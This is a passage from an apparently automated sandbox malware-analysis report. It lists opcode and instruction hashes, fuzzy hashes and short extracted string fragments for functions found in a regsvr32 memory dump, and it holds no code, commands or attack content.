                                                                    • Opcode Fuzzy Hash: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                                    • Instruction Fuzzy Hash: 18022574A0670CDBCBA9CFA8E48A69DBBF1FF14388F104119F816A7261C7B49919CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "Gd$C2$HG
                                                                    • API String ID: 0-142661339
                                                                    • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                    • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                                    • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                    • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: QZB$Vu9($W1Z
                                                                    • API String ID: 0-4157987319
                                                                    • Opcode ID: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                                    • Instruction ID: f699ba934c7511d53ebf66ced97cbd47477d8f387fb8544ab73dfc8f8e8f4cc9
                                                                    • Opcode Fuzzy Hash: 1f5c37778751f5a7f2813f46734b265b9b5d3f173c04e1f04c47467fdefc8410
                                                                    • Instruction Fuzzy Hash: 7DE1E870505B888FDBB9DF24CC897EBBBE1FB84705F10551EE84A9A290DBB49648CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #X$1c+$,p
                                                                    • API String ID: 0-4193689514
                                                                    • Opcode ID: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                                    • Instruction ID: a14642629d5f8cbd2a1e8fb09d7711f81952208659678b8c12dc59c418106fb0
                                                                    • Opcode Fuzzy Hash: 870c2a5dff4c858b49c61e00ad2e43c057056019502a976b576cc033676d3952
                                                                    • Instruction Fuzzy Hash: A0F166B5906749CFCB88DF68C28A58D7BF1BF59304F404129FC1A9A260D3B4E529CB49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :a$o1$F
                                                                    • API String ID: 0-2167756397
                                                                    • Opcode ID: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                                    • Instruction ID: c7b3f013bdef5c33efa64e5817367d2177fa9b070e37e7fa0e85b95e6b1d5a97
                                                                    • Opcode Fuzzy Hash: 1dc69b1f9148db4d8f727193868d76463b7f9b687988be903e8d180db9dc4b1f
                                                                    • Instruction Fuzzy Hash: 24A10170514609DFCB98DF28C58A6DE3BE1FF58318F40822AFC0A9B264C774DA58DB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "7F$hso$|
                                                                    • API String ID: 0-2223032787
                                                                    • Opcode ID: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                                    • Instruction ID: 597be8bf6f8274430a7b1b716aee764a508e33f64a18c5174bbc12e988f7dea5
                                                                    • Opcode Fuzzy Hash: a1c5852e2975669cd72ae99173752b080c1a60bb39e1eda62f5b8b24312d50f2
                                                                    • Instruction Fuzzy Hash: CDA1E7716057888FEB7ADF64C8AA7DE7BA1FF59308F40461DD98E8E250C7B45608CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: eG$ktw$l$6
                                                                    • API String ID: 0-3696190584
                                                                    • Opcode ID: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                                    • Instruction ID: ec7ece3e5b0c03f4df558a0a1733d02cea5b85f33e09dae2f6683fda9d55fcb2
                                                                    • Opcode Fuzzy Hash: cfb728ef8011932e57c4461def4d81df8b30877acb09ef5991ab02cb5d25377a
                                                                    • Instruction Fuzzy Hash: E47114B0509708EFCB98DF68C089A9E7BB1FB88344F40C52EE849DB264C775DA19CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %Di|$6qp$Z9s
                                                                    • API String ID: 0-2690900941
                                                                    • Opcode ID: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                                    • Instruction ID: 2c0d7369d6c4e2fe59306caeaa3cf354025216a739d91ba443ab140e2def37b4
                                                                    • Opcode Fuzzy Hash: 036a56b574e0cc9d8bbe6e2c16f1c72bf3a7a337ff5cb561951f94e63896fd73
                                                                    • Instruction Fuzzy Hash: 9C61257191070C9BCB88CF24C8C96DE7BB1FB483A8F556219FC0AAA294C7749985CF84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Fl$Fl$vv5
                                                                    • API String ID: 0-3053741108
                                                                    • Opcode ID: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                                    • Instruction ID: 55f6967587c9a541224425d329b03615816d53db549f94b6db3b05c8e91cbb03
                                                                    • Opcode Fuzzy Hash: 56c6ca64a2739fcec8bf5f3302d493d90fa60cbb6fd5cd63e6a43fd0d8d3c1f6
                                                                    • Instruction Fuzzy Hash: FC511A70E4870CAFDB69DFA8E0866DDBBF1FB58344F004519E40AE7291DB74990ACB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H8$nn$nn
                                                                    • API String ID: 0-4263809824
                                                                    • Opcode ID: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                                    • Instruction ID: 3c01ac5d5c2d3476a5cfb8eba6abf236e6c64549312703f260b6bb5002efdfbd
                                                                    • Opcode Fuzzy Hash: 01947e023cac002b8a0a3e4f78c79794eac0dde5bb4d18b8413bbe4288169ddb
                                                                    • Instruction Fuzzy Hash: 5361D67555878CCBEBBADF38CC897D97BB1FB48344F908219D80E8A260DB7457498B41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %Nz$,7%$}]{
                                                                    • API String ID: 0-2809531587
                                                                    • Opcode ID: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                                    • Instruction ID: b36c8970f11ad41429e233920f6dac2517fe43d92b96f19f813f385ea8bb4fb2
                                                                    • Opcode Fuzzy Hash: 676dc21c0f372b2db907baa94ef17c562d056d3d3dc12d9c581eeda360082d12
                                                                    • Instruction Fuzzy Hash: B771E470448788CBEBB5DF24C8856DEBBE4FB88744F60451DE9598B260DB749688CF01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,mQ$f41$c
                                                                    • API String ID: 0-1594525360
                                                                    • Opcode ID: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                                    • Instruction ID: ca916729033610084f534c396dc33c1afc583cc00ddec4c12c7a73cc6334aceb
                                                                    • Opcode Fuzzy Hash: 7f89cf11389eafb96d04b6400e87a1f2a1e5a7f99f0c72ab3958d5ee7197d732
                                                                    • Instruction Fuzzy Hash: AD51C071D0424C8BCB48DFA9E98A9DDBBF0FB48348F11820DE85AB7261C7749905CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q~$%s$R3
                                                                    • API String ID: 0-2520873970
                                                                    • Opcode ID: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                                    • Instruction ID: 49708784934b6f27b099c9a4c0d62a5c340693359db0e98dd39e1096da177659
                                                                    • Opcode Fuzzy Hash: 3d3ced99ac42584346b8bad3007d62ef26daa4ae2805a0976e45a495c47b2b96
                                                                    • Instruction Fuzzy Hash: 2D414870508784DBD398CF18C0DA65EBBF1FB853A4FA0691DF583862A4DB75D9898B03
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: [/$s$|'
                                                                    • API String ID: 0-508247755
                                                                    • Opcode ID: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                                    • Instruction ID: 494a7eb40676bfcc00c7fdba1f25141f52c7cc4812b1f7e8e8b884a852a0e06c
                                                                    • Opcode Fuzzy Hash: 7345308087df3ea52099129a82f0c3ea94bf5dab89828cea5ac59a44806af735
                                                                    • Instruction Fuzzy Hash: 1841D4B090038E8FCB48DFA9D88A5DEBBB1FB48348F10461DEC25A6250D7B49554CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: _#>$`cb{$fq
                                                                    • API String ID: 0-41881557
                                                                    • Opcode ID: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                                    • Instruction ID: 8d8b26aa43ab9a83d147a377112b64bfb8255cca975d25c3e902dea97d059722
                                                                    • Opcode Fuzzy Hash: 6dffa8c73f5f57da7de5f12e066b229d1e4dd53f1b7788c47ce25402a50e5fa7
                                                                    • Instruction Fuzzy Hash: 2941C0B180078E8FCF48CF64C88A5DE7FB0FB58358F104619E86AA6250D3B89665CFC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: =Z8$[U${To
                                                                    • API String ID: 0-582923006
                                                                    • Opcode ID: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                                    • Instruction ID: dd1ba70993956fe5376c9027ab0fa5dab7ea2e8642491db667c41f00a9894f6d
                                                                    • Opcode Fuzzy Hash: 510822f7632221338f4787e6ba9fbd6d482cd1ebd2bab9e95bda9979d09408e7
                                                                    • Instruction Fuzzy Hash: DA31AFB090074ECBCB88DF64C88A4DF7FB4FB68398F104219E855A6250D3B896A5CFD5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L$u.
                                                                    • API String ID: 0-1908859981
                                                                    • Opcode ID: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                                    • Instruction ID: fe013bb6a98280fd3664de29af0d6deafe853b8c6d857857911529a75c261ac8
                                                                    • Opcode Fuzzy Hash: 963c97d349dba17e05ff2ad4f8c091e323bd32606f741df39a0923b695cd3283
                                                                    • Instruction Fuzzy Hash: FDE1167152478DABDF98CF28C8C6ADD3BA1FB48394F906229FD0287260D775D985CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: v^$|8W
                                                                    • API String ID: 0-4274756280
                                                                    • Opcode ID: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                                    • Instruction ID: eb46043f5dfd862e599a3e1f0545fc92660674d3eece30cf186a2abccef00301
                                                                    • Opcode Fuzzy Hash: e8f720407405c8f842976055ebfe5a961945bc41caeca3a3e9e3a1284d36038d
                                                                    • Instruction Fuzzy Hash: 23D11171A0630CCBDB68DF68C58AA9D7BE1FF59348F104129FC1A9B261C770E919CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `:$u5\
                                                                    • API String ID: 0-1141760586
                                                                    • Opcode ID: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                                    • Instruction ID: 309421123f437f89acc2771e6a55141bc20ba277e2d56715f434ec53ca724750
                                                                    • Opcode Fuzzy Hash: de639cec483ce4a43014a1f68f5d3fafad908dcfa8fcc167b954aac45c8ab292
                                                                    • Instruction Fuzzy Hash: 69C1207150574DCBDB99CF28C58A6D93BE5FF98348F104129FC0E862A1CBB4EA18CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0Au$]6
                                                                    • API String ID: 0-775207805
                                                                    • Opcode ID: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                                    • Instruction ID: 6edab2825e6f92fa7d6d5649e6783b0aef41eda7633721283519dacdcc01bd9d
                                                                    • Opcode Fuzzy Hash: 41d6d67fb4784ff97a0c8e7ec9a302166e0b0c9de4538925550087b6d031b924
                                                                    • Instruction Fuzzy Hash: 2DE1D7706047889FCBBEDF24CC897DA7BA8FB46704F904619E9C98E250DB745748CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: S9$qrd
                                                                    • API String ID: 0-2332744662
                                                                    • Opcode ID: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                                    • Instruction ID: d3a666ff84b181fad27f9c2352a1e83f1b6bb5c561d3220c9e7978bd2dadc88f
                                                                    • Opcode Fuzzy Hash: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                                    • Instruction Fuzzy Hash: 6EB1357590660CCFCB69DFA4C08A6DDBBF1EF68344F104519E812AB262CBB0D919CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: hw}2$4&t
                                                                    • API String ID: 0-1169878757
                                                                    • Opcode ID: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                                    • Instruction ID: fd20564dcf1a671b287a6600624e9fb92dead2187b8d5629211a6de17e7e6b55
                                                                    • Opcode Fuzzy Hash: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                                    • Instruction Fuzzy Hash: AEB168B590420CCFDB68CF78C45A5DD7BF1FB08308F60612AE826AA262D774D919CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JMWd$a[
                                                                    • API String ID: 0-3276560754
                                                                    • Opcode ID: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                                    • Instruction ID: 3b54873520b9a846c0abc3e4022efff23af49e59c185cad729b6d512d224c3a2
                                                                    • Opcode Fuzzy Hash: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                                    • Instruction Fuzzy Hash: D5A106706047889FDBBACF18CC857DE3BA8FB46748F504229E8CA8E254CB745749CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %[$-
                                                                    • API String ID: 0-2535708364
                                                                    • Opcode ID: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                                    • Instruction ID: a7604732bdc10a899b7b050bfde45695c0722dd065d5eed74db0117fa162c574
                                                                    • Opcode Fuzzy Hash: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                                    • Instruction Fuzzy Hash: 1F81627050074ECBDB99DF14C88A7DE3BA0FB28389F114219FC85962A0D778C699CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: /Mr$i:O:
                                                                    • API String ID: 0-3426536595
                                                                    • Opcode ID: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                                    • Instruction ID: 3eba081f804be6fa3a9d4fb4db8c82f5607d3411af965209965460f3089a80c7
                                                                    • Opcode Fuzzy Hash: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                                    • Instruction Fuzzy Hash: 7C91087050438C8FDBBADF24C8AA7DE7BA1FB5A304F50461EEA4E8E250DB749644CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6|4$;|-
                                                                    • API String ID: 0-2897245347
                                                                    • Opcode ID: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                                    • Instruction ID: 839a7c11e172a9a14e1c367a044feafa9aab422ef7ede3a919e78660e0b6ca0a
                                                                    • Opcode Fuzzy Hash: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                                    • Instruction Fuzzy Hash: C0714B7090474D8FCF88DFA4C8866EEBBF0FB48308F114619E88AA7251D7789645CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: U$U#
                                                                    • API String ID: 0-861755185
                                                                    • Opcode ID: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                                    • Instruction ID: 3d07f47d2f6b9c27b0e4fe7d5859b29f381f1ada24735b7dc646a2f801c86eef
                                                                    • Opcode Fuzzy Hash: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                                    • Instruction Fuzzy Hash: 0C515C7150C7449FC7A8DF18D4C67AAB7E0FB88310F90991DF8CAC7251EB70A9598B82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fK$Pr
                                                                    • API String ID: 0-2696692655
                                                                    • Opcode ID: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                                    • Instruction ID: dfe3628fe45c31a405763d5fff7ed8f4d77ec04c4bb6b45016b3f1679df2575b
                                                                    • Opcode Fuzzy Hash: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                                    • Instruction Fuzzy Hash: 907116B090474E8FDB88CF28C88A6DE7BF0FB18358F515219FC4AA6260D774D598CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: n\$z+&
                                                                    • API String ID: 0-1414119057
                                                                    • Opcode ID: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                                    • Instruction ID: eeb2c5940d29436bcd670e7d8a2b521530b450e3042878bcb8e4954d48490cde
                                                                    • Opcode Fuzzy Hash: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                                    • Instruction Fuzzy Hash: 22612070A04B0C8BCBA9DF98D48AADDB7F1FB58344F00411DE846A7390DBB8950ACB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$50
                                                                    • API String ID: 0-2436285167
                                                                    • Opcode ID: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                                    • Instruction ID: 63debb9af518b5fca5d59737c01840b12b974a655eea7ff458552c4fa6b671e5
                                                                    • Opcode Fuzzy Hash: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                                    • Instruction Fuzzy Hash: 3671DF705087848FD769CF28C58965ABBF0FBC6344F008A1DF68686260CBB6D949CF03
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ,{$uC
                                                                    • API String ID: 0-1099860252
                                                                    • Opcode ID: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                                    • Instruction ID: df29777c25f03bc51b29c5e68a382a2b48421fa47568a9dd7f4acde699563025
